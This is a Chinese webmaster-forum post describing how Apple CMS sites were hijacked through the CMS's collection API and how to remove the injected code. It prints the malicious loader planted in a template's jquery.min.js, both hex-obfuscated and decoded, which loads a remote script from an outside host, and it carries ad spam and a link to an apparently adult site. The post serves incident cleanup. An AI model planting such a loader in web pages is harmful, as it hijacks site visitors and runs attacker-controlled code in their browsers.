xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse

2核1G3M服务器88一季度

腾讯云,阿里云百度云等 折扣价→点我←

苹果cms最新漏洞被挂马跳转劫持及清除代码 综合

匿名用户 超级版主组 2022/03/13 23:24:50

网站被挂马跳转劫持跳转到H APP下载页。

被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。

挂马图片

通过日志查看挂马过程

该漏洞是利用苹果CMS的API执行SHELL,

挂马文件在模板的jquery.min.js

;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73’;head.appendChild(script);
解密之后是

var head = document.getElementsByTagName(‘head’)[0];
var script = document.createElement(‘script’);
script[‘src’] = ‘https://maccms.z23.web.core.windows.net/732d.js’;
head.appendChild(script);
清除代码

关闭后台采集API功能。或自定义API接口名字,
欢迎关注我的网站http://sexrenge.com

苹果cms

TAGS javascript

站长窝论坛版权声明 1、本帖标题:苹果cms最新漏洞被挂马跳转劫持及清除代码
2、论坛网址:站长窝论坛
3、站长窝论坛的资源部分来源于网络,如有侵权,请联系站长进行删除处理。
4、会员发帖仅代表会员个人观点,并不代表本站赞同其观点和对其真实性负责。
5、站长窝论坛一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本帖由匿名用户在站长窝论坛《苹果cms_苹果cms模板_教程》版块原创发布, 转载请注明出处!
评论
最新回复 (0)
返回